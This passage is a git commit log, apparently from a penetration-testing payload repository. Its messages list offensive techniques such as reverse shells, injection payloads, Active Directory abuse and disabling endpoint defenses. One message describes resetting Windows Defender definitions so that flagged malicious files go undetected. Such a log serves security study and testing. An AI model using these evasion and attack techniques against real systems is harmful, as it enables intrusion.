2022-06-23 16:55:58 +02:00
Swissky
0f385c31c0 Merge pull request #509 from Sh0ckFR/patch-2
Added Thread Stack Spoofer description
2022-06-22 12:22:33 +02:00
Sh0ckFR
a4e43fb24c Added Thread Stack Spoofer description 2022-06-22 12:11:49 +02:00
Swissky
7a0b1c77e2 Merge pull request #508 from Sh0ckFR/patch-1
Added Sleep Mask Kit Link
2022-06-21 17:19:10 +02:00
Sh0ckFR
4b07c91e7b Added Sleep Mask Kit Link 2022-06-21 15:52:30 +02:00
Swissky
55a3239db6 Merge pull request #507 from noraj/patch-1
pivoting: add english version of the article
2022-06-20 22:35:08 +02:00
Alexandre ZANNI
b831175f99 add english version of the article 2022-06-20 20:31:11 +02:00
Swissky
28425b37a3 LFI to RCE via upload (FindFirstFile) 2022-06-19 22:48:46 +02:00
Swissky
3e4b4c09c2 Merge pull request #506 from hahwul/master
Update References link in NoSQL Injection
2022-06-17 12:58:18 +02:00
HAHWUL
26edecab6e Update README.md 2022-06-17 17:05:18 +09:00
Swissky
ad336b4d55 Privileged Access Management (PAM) Trust 2022-06-09 11:30:43 +02:00
Swissky
881c354b34 Pre-Created Computer Account 2022-06-08 12:14:11 +02:00
Swissky
0c7da8ec41 DNS Admins Group 2022-06-07 20:36:09 +02:00
Miłosz Skaza
eb933317d0 Add new ruby yaml gadget chain 2022-06-01 09:55:48 +01:00
Swissky
3066615cde LAPS Access + Pass the Cert + Writeable folder 2022-05-31 11:57:44 +02:00
Swissky
51aeb90623 Merge pull request #502 from NocFlame/master
Fixed some small typos and added a reference to hashcat
2022-05-25 11:08:31 +02:00
NocFlame
bebc87887a added link to hashcat 2022-05-25 10:09:09 +02:00
NocFlame
ca959ec806 Added missing parenthesis 2022-05-25 10:04:41 +02:00
NocFlame
2ef501f883 replaced backslash with forwardslash in cmd syntax
As defined in cmd.exe /?
/C Carries out the command specified by string and then terminates
2022-05-25 09:55:05 +02:00
Swissky
12ee527763 Merge pull request #500 from tarishard/master
Added information on 307 and 308 redirects
2022-05-19 12:29:02 +02:00
Tasos T
023a3c38e3 Added information on 307 and 308 redirects 2022-05-19 12:55:11 +03:00
Sanjay Das
af973ef0ad Added basic SSJI payloads 2022-05-17 09:53:37 +05:30
Swissky
5035ed0891 WSUS Exploitation 2022-05-15 21:22:39 +02:00
Swissky
096885e0ad Merge pull request #498 from PinkDraconian/patch-1
Single quotes are messing with the command.
2022-05-15 19:17:23 +02:00
PinkDraconian
5cc8e698c9 Single quotes are messing with the command. 2022-05-15 13:53:50 +02:00
Swissky
4cf464cc96 Certifried CVE-2022-26923 2022-05-13 09:44:51 +02:00
Swissky
d09659b164 Merge pull request #496 from cmd-ctrl-freq/master
Update Cloud - AWS Pentest.md
2022-05-11 10:25:30 +02:00
Swissky
ee528a862a Contributions README 2022-05-10 13:50:01 +02:00
Swissky
67457ec582 SCCM deployment + JSON uploads 2022-05-09 15:14:26 +02:00
khiemtq-cyber
507c493db2 Update Angular XSS 2022-05-07 12:55:15 +07:00
David Fentz
d3a296486e Update Cloud - AWS Pentest.md
Added a reference to Cloudgoat in the Training section of the AWS pentesting docs.
2022-05-05 08:48:55 -07:00
Swissky
33ea0b54fb Merge pull request #495 from hahwul/saml-update
Update tools in SAML Injection
2022-05-01 13:00:05 +02:00
HAHWUL
b3442dd8b5 Add ZAP Addon in Tools 2022-05-01 00:47:18 +09:00
Swissky
5f499adeb5 Merge pull request #494 from moayadalmalat/patch-1
Update Cobalt Strike - Cheatsheet.md
2022-04-25 15:57:53 +02:00
Moayad Almalat
8a6e8b8f05 Update Cobalt Strike - Cheatsheet.md
Update Cobalt Strike user Guide to the latest version.
2022-04-25 15:18:04 +02:00
Swissky
5a89c6a5ca Windows Management Instrumentation Event Subscription 2022-04-24 15:01:18 +02:00
Swissky
76993f86a6 Merge pull request #483 from 0x-nope/master
added Groovy EL section
2022-04-20 10:13:41 +02:00
0x-nope
59cae2ddb4 Update README.md 2022-04-20 09:42:58 +02:00
0x-nope
7d290ded54 Merge branch 'swisskyrepo:master' into master 2022-04-20 09:32:52 +02:00
Swissky
b8bfa1f226 Merge pull request #460 from idealphase/master
Update XSS README.md & Update Race Condition README.md
2022-04-19 11:34:18 +02:00
idealphase
9f9fbe4fe5 Updated Race Condition README.md
Added Turbo Intruder 2 Requests Examples use when the window may only be a few milliseconds.
2022-04-19 11:06:34 +07:00
idealphase
6738f878f3 Updated README.md
Added References: Bypassing Signature-Based XSS Filters: Modifying Script Code
2022-04-19 10:45:32 +07:00
idealphase
de532030df Merge branch 'swisskyrepo:master' into master 2022-04-19 10:43:04 +07:00
Swissky
578ea4d12b SOAP File Upload 2022-04-18 21:32:54 +02:00
Swissky
f8a7f1ded5 Merge pull request #462 from an4kein/patch-1
Update README.md
2022-04-18 21:02:50 +02:00
Swissky
85a50869f2 Merge pull request #482 from khiemtq-cyber/xss/angular-xss-1
[update] Angular XSS payload
2022-04-18 21:01:44 +02:00
Swissky
629f6d6cef Merge pull request #491 from Ooggle/patch-1
Add XSS document blacklist bypass
2022-04-18 20:59:20 +02:00
Swissky
4ea77223bb Merge pull request #486 from nerrorsec/patch-1
import os
2022-04-18 20:58:40 +02:00
Swissky
1a5537a044 Add warning about cPickle 2022-04-18 20:58:14 +02:00
Swissky
b337d209be Merge pull request #493 from noraj/patch-1
MSSQL: list permissions
2022-04-18 18:01:28 +02:00
Alexandre ZANNI
c274874430 MSSQL: list permissions 2022-04-18 17:21:26 +02:00
Swissky
e23f785c69 Merge pull request #492 from noraj/patch-1
HQLi in Java apps - HITBSecConf2016
2022-04-14 18:13:37 +02:00
Alexandre ZANNI
1f73834d5e HQLi in Java apps - HITBSecConf2016 2022-04-14 18:07:35 +02:00
Swissky
b0d05faded TruffleHog examples + Cortex XDR disable 2022-04-14 09:42:15 +02:00
Ooggle
39d1c6e7d8 Add document blacklist bypass 2022-04-09 12:55:21 +02:00
Swissky
9d07e04de7 Merge pull request #490 from xplo1t-sec/master
Added command injection filter bypass
2022-03-30 18:24:43 +02:00
xplo1t-sec
c885e76967 added new bypass 2022-03-30 03:16:37 -04:00
xplo1t-sec
4d8a45db5a added new bypass 2022-03-30 03:14:41 -04:00
xplo1t-sec
8a5e01f20d added new bypass 2022-03-30 03:13:18 -04:00
Swissky
89f0b93d43 Elastic EDR + VM Persistence 2022-03-27 19:50:33 +02:00
nerrorsec
df8493e4e6 import os 2022-03-24 11:54:34 +05:45
Swissky
d40e055629 Golden GMSA + Scheduled Task 2022-03-15 11:15:44 +01:00
Aj Dumanhug
3c441669d8 Update README.md 2022-03-13 01:30:37 +08:00
Swissky
4abd52697f MSSQL Agent Command Execution 2022-03-10 11:05:17 +01:00
Swissky
540d3ca399 Vajra + MSSQL hashes 2022-03-05 18:31:15 +01:00
0x-nope
3db4d04467 added Groovy EL section 2022-03-04 17:39:28 +01:00
Swissky
521975a05c AV Removal + Cobalt SleepKit 2022-03-01 23:01:25 +01:00
ktq-cyber
5d898e004f [update] Angular XSS payload 2022-02-23 22:26:16 +07:00
Swissky
6a193730be Merge pull request #481 from bodik/add-latex-controllchars
LaTeX Injection catcode
2022-02-22 16:01:15 +01:00
Radoslav Bodó
b8387bc3a5 LaTeX Injection catcode
add `\catcode` to disable LaTex control characters
2022-02-22 15:57:04 +01:00
Swissky
3e3562e553 ESC3 - Misconfigured Enrollment Agent Templates + Certipy v2 2022-02-20 13:15:28 +01:00
Swissky
71dcfd5ca7 ADCS ESC7 Shell + Big Query SQL 2022-02-18 14:50:38 +01:00
Swissky
4357f1e48f Merge pull request #480 from brightio/patch-1
Update LinPEAS links
2022-01-31 14:41:47 +01:00
brightio
d36f98b4ca Update LinPEAS links 2022-01-31 12:16:29 +01:00
Swissky
0b5c5acb87 ESC7 - Vulnerable Certificate Authority Access Control 2022-01-30 23:41:31 +01:00
Swissky
66af5b4337 Merge pull request #479 from netcode/fix-reverseshell-rm-bug
Fix rm bug in netcat reverseshell on OpenBSD & BusyBox
2022-01-29 21:04:19 +01:00
Eslam Salem
d7e357f53a fix rm bug in netcat reverseshell on OpenBSD & BusyBox 2022-01-29 17:19:30 +02:00
Swissky
3e58e4a4cf Merge pull request #478 from clem9669/patch-8
Update Active Directory Attack.md
2022-01-26 14:24:26 +01:00
clem9669
05a77e06fc Update Active Directory Attack.md
Updating the scanner modules for PingCastle.exe
2022-01-26 13:13:11 +00:00
Swissky
720e4bb3aa Merge pull request #477 from noraj/patch-1
add tools section
2022-01-23 21:07:59 +01:00
Alexandre ZANNI
a397a3d643 add revshellgen and merge to tools section 2022-01-22 23:08:25 +01:00
Alexandre ZANNI
a077ceab7c add tools section 2022-01-22 22:57:37 +01:00
Swissky
f107a32f1f Merge pull request #476 from clem9669/patch-8
Update Active Directory Attack.md
2022-01-19 10:34:51 +01:00
clem9669
76ec08cfb4 Update Active Directory Attack.md
Correcting typo
Removing dead website
Adjusting techniques
2022-01-18 22:52:58 +01:00
Swissky
c89976d1b0 Merge pull request #475 from int0x80/cmd-inj-spaces
Command Injection space alternatives
2022-01-15 12:15:26 +01:00
int0x80
171a6f2b21 Command Injection space alternatives 2022-01-14 18:39:52 -06:00
Swissky
f23412d67a Merge pull request #474 from Flower-dev/master
BOOKS.md : new books
2022-01-13 21:49:11 +01:00
Swissky
c90cb69def Update BOOKS.md 2022-01-13 21:48:21 +01:00
Flower Dev
7775ce2584 BOOKS.md: add books 2022-01-13 21:23:47 +01:00
Flower Dev
2f551d6bb5 BOOKS.md : new books 2022-01-13 21:18:12 +01:00
Swissky
218d557c3d Merge pull request #473 from clem9669/patch-8
Update Hash Cracking.md
2022-01-05 22:23:13 +01:00
Swissky
f0085e158b Removing potential DMCA material 2022-01-05 22:22:08 +01:00
clem9669
4642dd44fc Update Hash Cracking.md
Hey 👋 
Updating content with more information and more accurate resources.
2022-01-05 18:25:31 +00:00
Swissky
58f6a47b43 Fix typo 2022-01-04 21:11:55 +01:00
Swissky
dfe830d183 RODC - Read Only Domain Controller Compromise 2022-01-04 21:11:26 +01:00
Swissky
f2a2c6d6ce Merge pull request #472 from astroicers/patch-1
Update MySQL Injection.md
2022-01-04 09:07:57 +01:00
astroicers
119ae90db6 Update MySQL Injection.md
fix line 426
2022-01-04 14:28:17 +08:00
Swissky
b5df6e1447 ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 + Golden Certificate 2022-01-01 20:42:58 +01:00
Swissky
c5b49ec497 Merge pull request #471 from jenaye/patch-1
[Add] - php8 to extensions.lst
2022-01-01 13:20:06 +01:00
enaylal
d037335a4a add file php8 2022-01-01 11:48:07 +01:00
Houziaux Mike
5b131ec479 Update extensions.lst 2022-01-01 11:43:58 +01:00
Swissky
c9ef8f7f49 Graftcp Cheatsheet 2021-12-29 18:16:26 +01:00
Swissky
8411a0640d ESC4 - Access Control Vulnerabilities 2021-12-29 15:00:22 +01:00
Swissky
27768783ff Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings 2021-12-29 14:52:20 +01:00
Swissky
e3fb516747 MAQ + WEBDAV 2021-12-29 14:48:42 +01:00
Swissky
d8dd64e8e3 Merge pull request #470 from noraj/patch-1
update PowerGPOAbuse task command
2021-12-22 16:22:46 +01:00
Alexandre ZANNI
a430cfcc4e update PowerGPOAbuse task command 2021-12-22 16:09:07 +01:00
Swissky
210a2b3081 Merge pull request #468 from Zeecka/MySQL-Error-Based-Payload
Add NAME_CONST for MySQL Error based injection
2021-12-16 13:38:45 +01:00
Alex G
a568270b15 Add NAME_CONST for MySQL Error based injection 2021-12-16 12:11:25 +01:00
Swissky
0d6d6049ce AD + Log4shell + Windows Startup 2021-12-16 09:52:51 +01:00
Swissky
31c8a263c3 Merge pull request #467 from gitmalet/patch-1
Update SQL Injection/SQLite Injection.md
2021-12-14 22:09:26 +01:00
malet
4ab2649317 Fixing "RCE - Attach Database" Payload
The old payload doesn't work for many cases as the `php` in `<?php` is missing.
2021-12-14 19:54:41 +01:00
Swissky
5714b9c9d7 samAccountName spoofing + Java RMI 2021-12-13 20:42:31 +01:00
Swissky
10974722b1 BloodHound Custom Queries + MSSQL CLR 2021-12-12 23:04:35 +01:00
Swissky
19c7d1c9e8 Merge pull request #412 from A1vinSmith/master
Replace the web.config with the far better version web.web.config
2021-12-08 21:53:34 +01:00
Swissky
5974773387 Merge pull request #464 from BrianStadnicki/master
SQLite Injection add extract database structure
2021-12-07 09:30:15 +01:00
Brian Stadnicki
03427da534 SQLite Injection add extract database structure 2021-12-07 06:51:27 +00:00
nismo-s13
342b1f4f60 Rename shell.png?shell.php to shell.png^shell.php 2021-11-24 17:56:20 +13:00
nismo-s13
410758cf80 Rename shell.jpg?shell.php to shell.jpg^shell.php 2021-11-24 17:55:52 +13:00
nismo-s13
b1ce7a2547 Rename shell.gif?shell.php to shell.gif^shell.php 2021-11-24 17:55:13 +13:00
nismo-s13
35e64b2275 Delete Parser & Curl < 7.54.png 2021-11-24 17:47:39 +13:00
Eduardo Barbosa (an4kein)
51ac02d354 Update README.md
Find open buckets: https://buckets.grayhatwarfare.com/
2021-11-23 14:04:53 -03:00
idealphase
b14f35be86 Merge branch 'swisskyrepo:master' into master 2021-11-22 12:44:38 +07:00
Swissky
ccc1186997 Merge pull request #461 from CravateRouge/master
Add alternatives for AD ACL abuse from Linux
2021-11-15 17:46:39 +01:00
CravateRouge
8da5f36f85 Add alternatives for AD ACL abuse from Linux 2021-11-15 17:36:05 +01:00
idealphase
e9eac5ca59 Update README.md 2021-11-10 22:40:40 +07:00
idealphase
6c7df7dc4e Update README.md
Add Bypass dot filter
2021-11-10 22:38:02 +07:00
Swissky
7647407266 Merge pull request #458 from Techbrunch/patch-10
Replace xip.io by nip.io
2021-11-09 13:57:22 +01:00
Swissky
21b3a0630f Update README.md 2021-11-09 13:57:09 +01:00
Techbrunch
a614525b70 Replace xip.io by nip.io
xip.io appears to be dead
2021-11-09 11:15:44 +01:00
Swissky
3366f5eaac Merge pull request #445 from NirLevy98/reverse_shell_delete-unused-imports
Delete unused import
2021-11-07 21:16:37 +01:00
Swissky
a6eac592e1 Merge pull request #457 from noraj/patch-1
NoSQLi: add POST with urlencoded body
2021-11-07 21:16:06 +01:00
Alexandre ZANNI
e0f851e6e9 NoSQLi: add POST with urlencoded body 2021-11-07 17:49:50 +01:00
Swissky
7d9dd6806e Powershell Cheatsheet 2021-11-06 19:14:47 +01:00
Swissky
6ff9a71237 Merge pull request #456 from DanielGrunberger/master
Add kubescape to kubernetes tools
2021-11-02 12:26:23 +01:00
DanielGrunberger
fb4775ce41 Add kubescape to kubernetes tools 2021-11-01 23:08:04 +02:00
Swissky
2daebdddff Merge pull request #455 from h3xstream/master
SQL injection various additions
2021-11-01 10:38:44 +01:00
Philippe Arteau
4169e5d603 informa4on_schema => information_schema
(Copy-paste error)
2021-10-31 23:33:58 -04:00
Philippe Arteau
6c5e790234 SQLi: Whitespace alternatives + WAF Bypass 2021-10-31 23:25:08 -04:00
Swissky
1c8067a150 Relaying with WebDav Trick + Shadow Credential 2021-10-30 21:04:23 +02:00
Swissky
9d0efb90ea Merge pull request #454 from seadog007/patch-1
Fixed typo
2021-10-30 11:04:18 +02:00
Swissky
c62fd81dad Merge pull request #453 from h3xstream/master
Few filename fixes to allow Windows checkout
2021-10-30 11:03:57 +02:00
Li-Heng Yu
b223c66689 Fixed typo 2021-10-30 11:44:33 +08:00
Philippe Arteau
9d30f792d4 Remove filename with special characters.
The filenames are already covered in `XSS Injection/README.md`
2021-10-29 12:56:55 -04:00
Philippe Arteau
16986febde Remove filename with special characters.
The filenames are already covered in `XSS Injection/README.md`
2021-10-29 12:56:41 -04:00
Philippe Arteau
7443da045a Remove filename with special characters.
The filenames are already covered in `XSS Injection/README.md`
2021-10-29 12:56:25 -04:00
Philippe Arteau
17e2833f1d Rename file with less than symbol. 2021-10-29 12:26:45 -04:00
Swissky
e9c8953249 Merge pull request #452 from llamasoft/patch-1
Update Kubernetes readme.md
2021-10-29 10:04:57 +02:00
Marcus T
ab9e266b37 Update Kubernetes readme.md
Adds information about container environments, service accounts, and volumes
2021-10-28 19:28:01 -04:00
Swissky
ee03092eec Merge pull request #451 from marcan2020/DNS-rebinding
DNS rebinding
2021-10-27 22:42:24 +02:00
marcan2020
0803cb04ee Merge branch 'swisskyrepo:master' into DNS-rebinding 2021-10-27 16:20:23 -04:00
marcan2020
f26844f083 Add DNS rebinding 2021-10-27 16:19:56 -04:00
Swissky
e3373dd108 UnPAC The Hash + MachineKeys.txt 2021-10-26 21:56:39 +02:00
Swissky
add722d1c2 Merge pull request #450 from ahronmoshe/patch-3
Update README.md
2021-10-26 21:51:41 +02:00
ahronmoshe
a26867fdf9 Update README.md 2021-10-26 20:35:04 +03:00
Swissky
1a3058f40c Device Code Phish 2021-10-24 20:07:46 +02:00
HAHWUL
5e415caea7 Merge branch 'master' into master 2021-10-21 00:44:35 +09:00
HAHWUL
e6f549f96e Add ZAP FileUpload AddOn to Tools 2021-10-20 09:07:29 +09:00
Swissky
d484212de9 Merge pull request #447 from mschader/patch-5
Update XXE Injection
2021-10-18 12:39:53 +02:00
Markus
46aabc8c8c Update XXE Injection
Slight QOL improvements for the recent changes of the chapter `XXE inside XLSX file`
2021-10-18 10:13:30 +02:00
Swissky
220e0efef6 Merge pull request #446 from noraj/patch-1
XXE: OOB via FTP + remote DTD for XSLX files
2021-10-17 18:52:17 +02:00
Alexandre ZANNI
d19b843111 XXE: OOB via FTP + remote DTD for XSLX files
better than the HTTP method, most robust approach, easier zip repackaging
2021-10-17 18:00:00 +02:00
Nir
4207479cce Delete unused imports 2021-10-16 11:33:38 +03:00
Swissky
7e18158c3b Merge pull request #444 from mschader/patch-4
Update Windows - Persistence.md
2021-10-14 09:51:35 +02:00
Markus
6584df310f Update Windows - Persistence.md
Add example to `disable windows defender` which uses MpCmdRun.exe to reset the current definitions. I recently used this and it was sufficient that Defender did not recognize previously flagged malicious files. It is quite helpful in case Set-MpPreference is not present or the attacker is not allowed to adjust the service.
2021-10-14 08:53:25 +02:00
Swissky
45821c00ea Merge pull request #443 from Flower-dev/master
add links books
2021-10-12 21:03:23 +02:00
Flower Dev
1984797f96 add links books 2021-10-12 20:33:31 +02:00
Swissky
d2ca8d8016 Merge pull request #442 from Flower-dev/master
BOOKS.md : new books
2021-10-12 20:21:34 +02:00
Flower Dev
f6ba0ddbff BOOKS.md : new books 2021-10-12 20:17:52 +02:00
Swissky
9688e6e88e Merge pull request #441 from marcan2020/patch-12
Update breakout techniques
2021-10-11 23:13:38 +02:00
marcan2020
39a89e937a Update breakout techniques
- Add a section on unassociated protocols
- Add paths to access filesystem via the address bar
- Fix Stick Keys link
- Fix Task Manager shortcut
- Add reference to HackTricks
2021-10-11 13:53:19 -04:00
Swissky
440b8d825e Merge pull request #440 from mschader/patch-3
Update Hash Cracking Methodology
2021-10-11 18:11:48 +02:00
Markus
d1345b0016 Update Hash Cracking Methodology
Add some structure to add additional tools.
Fix some typo.
Add online resources for cracking password hashes.
2021-10-11 17:08:46 +02:00
Swissky
6c48d0ae49 Merge pull request #438 from mschader/patch-2
Update directory traversal wordlist
2021-10-11 10:13:43 +02:00
Markus
7e737baa23 Update directory traversal wordlist
Update the intruder wordlist to include CVE-2021-42013 (Traversal/RCE into Apache 2.4.49/2.4.50).
Also add some depth to the current fuzzing payloads to not miss /cgi-bin directories which are located deeper than 4 subdirectories.
2021-10-11 10:11:10 +02:00
Swissky
0a10a4d029 Merge pull request #437 from swisskyrepo/hash-cracking
Hash Cracking v0.1
2021-10-10 23:06:18 +02:00
Swissky
883c35a9e5 Hash Cracking v0.1 2021-10-10 23:05:01 +02:00
Swissky
c664a0ee09 Merge pull request #436 from stefanman125/patch-1
Added CVE-2021-41773 payload
2021-10-06 21:16:19 +02:00
Stefan
e4a1217200 Added CVE-2021-41773 payload 2021-10-06 11:10:25 -04:00
Swissky
382a6d57e2 Merge pull request #435 from p0dalirius/patch-2
Fixed typos, added links and better formatting in Active Directory Attack.md
2021-10-06 10:17:38 +02:00
p0dalirius
09b1b8984a Update Active Directory Attack.md 2021-10-06 09:05:49 +02:00
p0dalirius
8045496946 Update Active Directory Attack.md 2021-10-06 08:59:13 +02:00
p0dalirius
19b4bee7a0 Update Active Directory Attack.md 2021-10-06 08:54:16 +02:00
p0dalirius
e0b8bee5a6 Update Active Directory Attack.md 2021-10-06 08:45:44 +02:00
p0dalirius
25b6003229 Update Active Directory Attack.md 2021-10-06 08:29:59 +02:00
p0dalirius
ee53c960f0 Update Active Directory Attack.md 2021-10-06 08:24:51 +02:00
p0dalirius
6d816c6e4b Update Active Directory Attack.md 2021-10-06 08:23:07 +02:00
Podalirius
286b7c507e Update Active Directory Attack.md 2021-10-06 08:15:51 +02:00
Swissky
acca37dc79 Merge pull request #434 from jaxBCD/patch-1
Update Oracle Sql injection.md add sql error
2021-10-04 17:54:05 +02:00
jaxBCD
11dc7bc2c2 Update Oracle Sql injection.md add sql error
Add some error point oracle sql injection
2021-10-04 22:52:48 +07:00
Swissky
3b5f23b4ea Merge pull request #433 from stevenfranks/feature/update-books
Refactor Books Page
2021-10-04 10:37:12 +02:00
Swissky
e240bbe4a3 Merge pull request #432 from p0dalirius/ssti_payloads
Added ssti payloads to intruder "ssti.fuzz" wordlist.
2021-10-04 10:35:06 +02:00
Steven Franks
526f06e5c8 Update BOOKS.md 2021-10-04 09:24:14 +01:00
p0dalirius
9ce58c14ef Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
36dc8742c1 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
e65c5ed291 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
704a7415cf Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
861d13780b Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
8482f742ff Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
bb65411c62 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
24b2676f97 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
4313b4f373 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
9a63827cdb Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
d7faae081d Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
4345789297 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
5518c14388 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
19214a7db4 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
154c07780c Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
520249a749 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
5577595699 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
7a2af52709 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
9ccd1e4e71 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
ebc1876c64 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
11478b6993 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
861c545349 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
3a82a104bc Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
5161a1df40 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
2b620c3490 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
c923e50c6f Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
246021fcd5 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
87ae86dcf9 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
81ef493e98 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
d43c041983 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
b389464212 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
2e1ca7710d Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
dcf8c6dd06 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
0357ba0152 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
f918af50f7 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
af2e5712c9 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
782045a401 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
70eb4d9315 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
3dec0dd66a Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
7f8f8216db Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
8c7f18a1e0 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
53e4376768 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
7b68dba601 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
018680b5d9 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
4b27af5a3d Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
7582f0c527 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
f7c32338e7 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
438b9f7564 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
5b93737723 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
cad01e9f31 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
b0f90090c1 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
bdab385cfb Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
21318a12cd Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
b84e4c3a7d Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
dd875ffa32 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
039dae7c32 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
deed44397a Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
e35d1b0ffd Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
106ea6b2e7 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
p0dalirius
90eb285fe7 Update ssti.fuzz 2021-10-04 09:21:10 +02:00
Swissky
b0d96cb657 Merge pull request #429 from mschader/patch-1
XSS: Remove unnecessary complexity from CSP bypass payload
2021-10-01 17:00:09 +02:00
Markus
7996b4f905 Update XSS README.md
Remove unnecessary complexity from CSP bypass payload
2021-10-01 16:10:23 +02:00
Swissky
0024e2a3a9 Merge pull request #427 from PiyushThePal/master
Update README.md
2021-10-01 11:13:45 +02:00
Piyush Paliwal
0e744e7eed Update README.md 2021-10-01 13:42:12 +05:30
Piyush Paliwal
181dfd8355 Update README.md 2021-10-01 13:39:18 +05:30
Piyush Paliwal
d1cf4b20a0 Update README.md 2021-10-01 13:35:33 +05:30
Piyush Paliwal
26a5f65a64 Update README.md 2021-10-01 10:17:31 +05:30
Swissky
000d1f9260 Merge pull request #426 from CravateRouge/patch-2
Add python check for ZeroLogon
2021-10-01 00:58:58 +02:00
Swissky
31667c91b6 Merge pull request #425 from CravateRouge/patch-1
Add Linux alternatives for GenericWrite abuse
2021-10-01 00:58:09 +02:00
CravateRouge
52d83bea5f Add python check for ZeroLogon 2021-09-30 23:38:48 +02:00
CravateRouge
1cdd284f5b Add Linux alternatives for GenericWrite abuse 2021-09-30 22:17:20 +02:00
Swissky
df7172dca1 Merge pull request #424 from p0dalirius/master
Added missing descriptions and fixed color formatting for LaTeX
2021-09-29 09:39:35 +02:00
Podalirius
173e34ede0 Fixed arrow characters in shell prompts for clarity
2021-09-29 07:39:07 +02:00
Podalirius
1865b8a85b Update README.md 2021-09-29 07:28:11 +02:00
Swissky
71988cfb40 Merge pull request #423 from p0dalirius/master
Alphabetical sort of the technologies + official websites
2021-09-26 22:17:13 +02:00
Podalirius
25eae11675 Update README.md 2021-09-26 21:57:50 +02:00
Podalirius
6d48f28d99 Update README.md 2021-09-26 21:55:23 +02:00
Podalirius
58d88e5293 Update README.md 2021-09-26 21:48:51 +02:00
Podalirius
030e536586 Update README.md 2021-09-26 21:37:05 +02:00
Podalirius
f44fae68b5 Update README.md 2021-09-26 21:30:35 +02:00
Podalirius
5d846e9b8d Update README.md 2021-09-26 21:28:29 +02:00
Swissky
e68dc99749 Merge pull request #422 from A1vinSmith/master
Update MySQL Injection.md
2021-09-25 18:17:10 +02:00
Alvin Smith
335a5c42fb Update MySQL Injection.md 2021-09-25 22:53:25 +12:00
Swissky
b3d31e45e5 Merge pull request #421 from p0dalirius/master
Added shorter payloads for Server Side Template injections in jinja2
2021-09-19 00:03:02 +02:00
Podalirius
b5699ecf08 Update README.md 2021-09-18 20:03:12 +02:00
Swissky
d2f63406cd IIS + Certi + NetNTLMv1 2021-09-16 17:45:29 +02:00
Swissky
c957271453 SSRF PDF PhantomJS 2021-09-08 12:49:32 +02:00
Swissky
3af70155e2 DCOM Exec Impacket 2021-09-07 14:48:57 +02:00
Swissky
780d8ba313 Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings 2021-09-07 10:23:12 +02:00
Swissky
23438cc68e Mitigation NTLMv1 2021-09-07 10:22:39 +02:00
Swissky
90f37e57ec Merge pull request #420 from looCiprian/master
Added XSS <object> payload
2021-09-06 21:05:30 +02:00
Swissky
c8076e99c9 Net-NTLMv1 + DriverPrinter 2021-09-06 20:58:44 +02:00
Lorenzo Grazian
